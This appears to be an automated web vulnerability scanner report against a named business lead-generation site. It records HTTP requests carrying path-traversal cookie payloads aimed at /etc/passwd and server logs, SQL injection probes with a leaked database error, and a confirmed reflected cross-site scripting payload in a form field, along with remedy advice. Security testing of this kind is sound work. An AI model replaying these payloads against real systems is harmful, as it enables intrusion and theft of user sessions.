OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=skd6av0kd4gohuimjahqaje553; path=/
Content-Length: 4013
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&' at line 5
Cross-site Scripting

Cross-site Scripting
150 TOTAL
IMPORTANT
CONFIRMED
150
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST '"--></style></script><script>alert(0x000367)</script>
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000367)%3c%2fscript%3e&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=B2AC4951C334EC42E37C39F904846994; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="'"--></style></script><script>netsparker(0x000367)</script>"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
